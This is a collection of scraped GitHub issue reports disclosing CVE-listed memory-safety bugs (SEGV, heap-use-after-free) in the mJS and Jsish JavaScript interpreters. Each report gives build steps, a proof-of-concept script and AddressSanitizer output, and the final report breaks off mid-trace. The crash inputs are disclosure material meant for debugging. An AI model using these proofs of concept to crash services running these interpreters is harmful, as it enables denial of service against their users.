Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via free_json_frame at src/mjs_json.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((JSON.stringify-6.34321e2)(JSON.stringify([1, 2, 3])));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
\> $ Gmjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
======ERROR: AddressSanitizer: SEGV on unknown address 0x561b4e461e9c (pc 0x561b4e461ed5 bp 0x000000000080 sp 0x7ffdacf6fb18 T0)
======The signal is caused by a WRITE memory access.
    #0 0x561b4e461ed4 in free\_json\_frame src/mjs\_json.c:323
    #1 0x561b4e461ed4 in mjs\_json\_parse src/mjs\_json.c:476
    #2 0x7ffdacf6fc0f  (<unknown module>)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_json.c:323 in free\_json\_frame
======ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46550: SEGV src/mjs_json.c:323 in free_json_frame · Issue #230 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_set_internal at src/mjs_object.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((load - 6. + 4321e2)([([JSON.parse(JSON.stringify([(0)]))])]));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==51917==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffffffff81 (pc 0x5576b72e39f0 bp 0x000000000081 sp 0x7ffd4baed160 T0)
==51917==The signal is caused by a READ memory access.
    #0 0x5576b72e39ef in mjs\_set\_internal src/mjs\_object.c:207
    #1 0x5576b72e39ef in mjs\_set\_v src/mjs\_object.c:155

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_object.c:207 in mjs\_set\_internal
==51917==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46553: SEGV src/mjs_object.c:207 in mjs_set_internal · Issue #226 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_bcode_insert_offset at src/mjs_bcode.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((load - 6.34 * 21e2)([([JSON.parse(JSON.stringify([(0)]))])]));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
ASAN:DEADLYSIGNAL
=================================================================
==88306==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000008c (pc 0x558644d0edbc bp 0x000000000084 sp 0x7fffa37031f8 T0)
==88306==The signal is caused by a READ memory access.
==88306==Hint: address points to the zero page.
    #0 0x558644d0edbb in mjs\_bcode\_insert\_offset src/mjs\_bcode.c:67
    #1 0x7fffa3703a0f  (<unknown module>)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mjs\_bcode.c:67 in mjs\_bcode\_insert\_offset
==88306==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46556: SEGV src/mjs_bcode.c:67 in mjs_bcode_insert_offset · Issue #227 · cesanta/mjs

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via NumberConstructor at src/jsiNumber.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 2 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var list \= \[
    'aa',
    'hh'
\];
Number.bind(2, 4)();

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
=====ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55d872876fd3 bp 0x7ffd8a3d6b10 sp 0x7ffd8a3d6240 T0)
=====The signal is caused by a READ memory access.
=====Hint: address points to the zero page.
    #0 0x55d872876fd2 in NumberConstructor src/jsiNumber.c:93
    #1 0x55d87284a818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x55d8727c7fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x55d8727c7fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x55d872843ad6 in jsi\_FuncBindCall src/jsiProto.c:299
    #5 0x55d87284a818 in jsi\_FuncCallSub src/jsiProto.c:244
    #6 0x55d872b1471a in jsiFunctionSubCall src/jsiEval.c:796
    #7 0x55d872b1471a in jsiEvalFunction src/jsiEval.c:837
    #8 0x55d872b1471a in jsiEvalCodeSub src/jsiEval.c:1264
    #9 0x55d872b2815e in jsi\_evalcode src/jsiEval.c:2204
    #10 0x55d872b2c274 in jsi\_evalStrFile src/jsiEval.c:2665
    #11 0x55d87281b66a in Jsi\_Main src/jsiInterp.c:936
    #12 0x55d87302003a in jsi\_main src/main.c:47
    #13 0x7fb276e6fbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #14 0x55d8727af969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiNumber.c:93 in NumberConstructor

Credits: Found by OWL337 team.

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may have a correlation with #66, but I'm not for sure. Report this issue to assist your debug.

![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=88&v=4)

FIxed by fix for issue #66

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46490: SEGV src/jsiNumber.c:93 in NumberConstructor · Issue #67 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via jsi_ArrayConcatCmd at src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var i \= 0;

function JSEtest()
{
  arr\[arr\[1000\] \= 3\] \= 3;
  i++;
}

var arr \= new Array(10);
arr\[2\] \= 2;
arr.concat(JSEtest);

(arr.reduceRight(arr.concat), 0, '1');

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

ASAN:DEADLYSIGNAL
=================================================================
==121369==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x563e6997e690 bp 0x00000000000a sp 0x7ffcb3c19980 T0)
==121369==The signal is caused by a READ memory access.
==121369==Hint: address points to the zero page.
    #0 0x563e6997e68f in jsi\_ArrayConcatCmd src/jsiArray.c:311
    #1 0x563e69943818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x563e698c0fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x563e698c0fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x563e69985851 in jsi\_ArrayReduceSubCmd src/jsiArray.c:641
    #5 0x563e69985851 in jsi\_ArrayReduceRightCmd src/jsiArray.c:672
    #6 0x563e69943818 in jsi\_FuncCallSub src/jsiProto.c:244
    #7 0x563e69c0d71a in jsiFunctionSubCall src/jsiEval.c:796
    #8 0x563e69c0d71a in jsiEvalFunction src/jsiEval.c:837
    #9 0x563e69c0d71a in jsiEvalCodeSub src/jsiEval.c:1264
    #10 0x563e69c2115e in jsi\_evalcode src/jsiEval.c:2204
    #11 0x563e69c25274 in jsi\_evalStrFile src/jsiEval.c:2665
    #12 0x563e6991466a in Jsi\_Main src/jsiInterp.c:936
    #13 0x563e6a11903a in jsi\_main src/main.c:47
    #14 0x7fde1e7babf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #15 0x563e698a8969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiArray.c:311 in jsi\_ArrayConcatCmd

Credits: Found by OWL337 team.

CVE-2021-46488: SEGV src/jsiArray.c:311 in jsi_ArrayConcatCmd · Issue #68 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ArgTypeCheck in src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 2 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= \[
  'aa',
  'gg',
  'hhh',
  'mm',
  'nn'
\];
'sort:' + JSEtest.sort(function (str, position) {
  return JSEtest.unshift('pop:' + JSEtest.pop());
});
!'concat:' + JSEtest.concat().every(function (E) {
  return 'sort:' + JSEtest.sort(function (str, position) {
    return JSEtest.unshift('pop:' + JSEtest.pop());
  });
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007458 at pc 0x5566730cf1ca bp 0x7ffe092500c0 sp 0x7ffe092500b0
READ of size 1 at 0x603000007458 thread T0
    #0 0x5566730cf1c9 in jsi\_ArgTypeCheck src/jsiFunc.c:207
    #1 0x556673158c49 in jsi\_FuncCallSub src/jsiProto.c:263
    #2 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #3 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #4 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #5 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x556673158834 in jsi\_FuncCallSub src/jsiProto.c:220
    #7 0x5566730d4fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #8 0x5566730d4fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #9 0x556673186fa8 in SortSubCmd src/jsiArray.c:970
    #10 0x7f067f973311  (/lib/x86\_64-linux-gnu/libc.so.6+0x42311)
    #11 0x7f067f9736b5 in qsort\_r (/lib/x86\_64-linux-gnu/libc.so.6+0x426b5)
    #12 0x55667318a611 in jsi\_ArraySortCmd src/jsiArray.c:1065
    #13 0x556673157818 in jsi\_FuncCallSub src/jsiProto.c:244
    #14 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #15 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #16 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #17 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #18 0x556673158834 in jsi\_FuncCallSub src/jsiProto.c:220
    #19 0x5566730d4fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #20 0x5566730d4fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #21 0x55667319bf64 in jsi\_ArrayFindSubCmd src/jsiArray.c:576
    #22 0x55667319bf64 in jsi\_ArrayEveryCmd src/jsiArray.c:663
    #23 0x556673157818 in jsi\_FuncCallSub src/jsiProto.c:244
    #24 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
    #25 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
    #26 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
    #27 0x55667343515e in jsi\_evalcode src/jsiEval.c:2204
    #28 0x556673439274 in jsi\_evalStrFile src/jsiEval.c:2665
    #29 0x55667312866a in Jsi\_Main src/jsiInterp.c:936
    #30 0x55667392d03a in jsi\_main src/main.c:47
    #31 0x7f067f952bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #32 0x5566730bc969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000007458 is located 8 bytes inside of 32-byte region \[0x603000007450,0x603000007470)
freed by thread T0 here:
    #0 0x7f06805c17a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x5566730dd6cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f06805c1d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55667312daa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiFunc.c:207 in jsi\_ArgTypeCheck
Shadow bytes around the buggy address:
  0x0c067fff8e30: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8e40: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8e50: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8e60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8e70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
\=>0x0c067fff8e80: fd fd fa fa fd fd fd fd fa fa fd\[fd\]fd fd fa fa
  0x0c067fff8e90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8ea0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8eb0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8ec0: fd fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
  0x0c067fff8ed0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may be related to #74 & #80, especially the POC, but I'm not for sure. Report this issue to assist your debug.

![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=88&v=4)

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46500: Heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck · Issue #85 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_wswebsocketObjFree in src/jsiWebSocket.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

console.printf\= (new WebSocket);
setTimeout(console, 100000);

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x61b000000080 at pc 0x55b167ed6de6 bp 0x7ffcd360f220 sp 0x7ffcd360f210
READ of size 4 at 0x61b000000080 thread T0
    #0 0x55b167ed6de5 in jsi\_wswebsocketObjFree src/jsiWebSocket.c:3190
    #1 0x55b167e7ba2d in jsi\_UserObjFree src/jsiUserObj.c:75
    #2 0x55b167dfeefb in Jsi\_ObjFree src/jsiObj.c:334
    #3 0x55b167dffa0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #4 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
    #5 0x55b167cae3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #6 0x55b167cae6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #7 0x55b167dfc697 in DeleteTreeValue src/jsiObj.c:177
    #8 0x55b167e14384 in Jsi\_TreeEntryDelete src/jsiTree.c:636
    #9 0x55b167e15f10 in destroy\_node src/jsiTree.c:496
    #10 0x55b167e15f10 in destroy\_node src/jsiTree.c:494
    #11 0x55b167e15f10 in Jsi\_TreeDelete src/jsiTree.c:515
    #12 0x55b167dfe9df in Jsi\_ObjFree src/jsiObj.c:348
    #13 0x55b167dffa0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #14 0x55b167cae3d1 in ValueFree src/jsiValue.c:178
    #15 0x55b167cae3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #16 0x55b167cae6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #17 0x55b167dbe4d4 in Jsi\_EventFree src/jsiCmds.c:204
    #18 0x55b167cd44e2 in freeEventTbl src/jsiInterp.c:570
    #19 0x55b167d768dd in Jsi\_HashClear src/jsiHash.c:507
    #20 0x55b167d76cd7 in Jsi\_HashDelete src/jsiHash.c:526
    #21 0x55b167ce787c in jsiInterpDelete src/jsiInterp.c:1936
    #22 0x55b1684fe047 in jsi\_main src/main.c:49
    #23 0x7f5c2d555bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #24 0x55b167c8d969 in \_start (/usr/local/bin/jsish+0xe8969)

0x61b000000080 is located 0 bytes inside of 1656-byte region \[0x61b000000080,0x61b0000006f8)
freed by thread T0 here:
    #0 0x7f5c2e1c47a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x55b167ed6d22 in jsi\_wswebsocketObjFree src/jsiWebSocket.c:3199

previously allocated by thread T0 here:
    #0 0x7f5c2e1c4d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55b167cfeaa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiWebSocket.c:3190 in jsi\_wswebsocketObjFree
Shadow bytes around the buggy address:
  0x0c367fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c367fff8010:\[fd\]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c367fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46498: Heap-use-after-free src/jsiWebSocket.c:3190 in jsi_wswebsocketObjFree · Issue #81 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via SortSubCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= \[
  'aa',
  'bb',
  'cc'
\];
var results \= JSEtest;
JSEtest.findIndex(function (kV) {
  JSEtest.sort(function (str, position) {
    results.push(kV);
  });
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
==106201==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000018678 at pc 0x56468deff5a0 bp 0x7fff9a37c2a0 sp 0x7fff9a37c290
READ of size 8 at 0x60c000018678 thread T0
    #0 0x56468deff59f in SortSubCmd src/jsiArray.c:958
    #1 0x7fb68d0b0311  (/lib/x86\_64-linux-gnu/libc.so.6+0x42311)
    #2 0x7fb68d0b027d  (/lib/x86\_64-linux-gnu/libc.so.6+0x4227d)
    #3 0x7fb68d0b027d  (/lib/x86\_64-linux-gnu/libc.so.6+0x4227d)
    #4 0x7fb68d0b06b5 in qsort\_r (/lib/x86\_64-linux-gnu/libc.so.6+0x426b5)
    #5 0x56468df02611 in jsi\_ArraySortCmd src/jsiArray.c:1065
    #6 0x56468decf818 in jsi\_FuncCallSub src/jsiProto.c:244
    #7 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796
    #8 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837
    #9 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264
    #10 0x56468e1ad15e in jsi\_evalcode src/jsiEval.c:2204
    #11 0x56468ded0834 in jsi\_FuncCallSub src/jsiProto.c:220
    #12 0x56468de4cfec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #13 0x56468de4cfec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #14 0x56468df0dc0b in jsi\_ArrayFindSubCmd src/jsiArray.c:576
    #15 0x56468df0dc0b in jsi\_ArrayFindIndexCmd src/jsiArray.c:666
    #16 0x56468decf818 in jsi\_FuncCallSub src/jsiProto.c:244
    #17 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796
    #18 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837
    #19 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264
    #20 0x56468e1ad15e in jsi\_evalcode src/jsiEval.c:2204
    #21 0x56468e1b1274 in jsi\_evalStrFile src/jsiEval.c:2665
    #22 0x56468dea066a in Jsi\_Main src/jsiInterp.c:936
    #23 0x56468e6a503a in jsi\_main src/main.c:47
    #24 0x7fb68d08fbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #25 0x56468de34969 in \_start (/usr/local/bin/jsish+0xe8969)

0x60c000018678 is located 56 bytes inside of 128-byte region \[0x60c000018640,0x60c0000186c0)
freed by thread T0 here:
    #0 0x7fb68dcfef30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x56468dea5972 in Jsi\_Realloc src/jsiUtils.c:47

previously allocated by thread T0 here:
    #0 0x7fb68dcfef30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x56468dea5972 in Jsi\_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiArray.c:958 in SortSubCmd
Shadow bytes around the buggy address:
  0x0c187fffb070: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c187fffb090: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c187fffb0a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c187fffb0c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd\[fd\]
  0x0c187fffb0d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c187fffb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fffb0f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c187fffb100: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c187fffb110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==106201\==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46501: Heap-use-after-free src/jsiArray.c:958 in SortSubCmd · Issue #86 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ValueCopyMove in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

function JSEtest(){}

var arr \= /x?y?z?/.exec("abcd");
arr\[arr\[1000\] \= 3\](arr.every(JSEtest), arr\[1000\] \= 3, '1')

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==99189==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000006e84 at pc 0x5637792b29cd bp 0x7ffef5f97e60 sp 0x7ffef5f97e50
READ of size 4 at 0x603000006e84 thread T0
    #0 0x5637792b29cc in jsi\_ValueCopyMove src/jsiValue.c:245
    #1 0x5637792b29cc in Jsi\_ValueCopy src/jsiValue.c:301
